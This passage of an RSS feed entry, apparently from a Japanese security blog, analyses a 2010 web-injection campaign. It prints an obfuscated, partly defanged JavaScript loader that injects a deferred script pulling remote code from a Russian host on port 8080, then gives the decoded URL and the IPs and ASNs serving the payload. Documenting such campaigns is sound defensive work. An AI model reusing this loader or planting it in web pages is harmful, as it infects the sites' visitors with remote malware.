（）o&amp;m&amp;.$@（a^u!／^##g））（）o#^o#&amp;#g$#l!^）e$$.&amp;#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&amp;（&amp;e#^n$t^@^$s!&amp;$^.（@r#!@u）$#&amp;／（a@$l$#l!（e!^g$）（r&amp;$#）o$^&amp;.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&amp;l（e@.#!c&amp;o&amp;@m$#／^<br />
'.replace（／#|@|\^|\$|\!|&amp;|\）|\（／ig, ''） ;<br />
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;<br />
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}</span><br />
<br />
decode: <br />
iciba-com.constantcontact.com.perezhilton-com.<span class="cBurn">biltop .ru</span>:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/<br />
<br />
また、散布ISPにも変動があり、<br />
<span class="cBurn">77.72.25.34</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:44062"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS44062</a>(TESENE) <img src="http://www3.atword.jp/gnome/files/2009/10/flag_italy.gif" class="cFlag" alt="" /><br />
<span class="cBurn">83.168.238.66</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:35041"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS35041</a>(NET-CRYSTONE) <img src="http://www3.atword.jp/gnome/files/2009/11/flag_sweden.gif" class="cFlag" alt="" /><br />
の２者が参戦しています。<br />
<br />
どこまで勤勉なんでしょうね・・・</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/02/8080-aka-gnu-gpl-changed-thier-script/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/02/8080-aka-gnu-gpl-changed-thier-script/" />
	</item>
	</channel>
</rss>
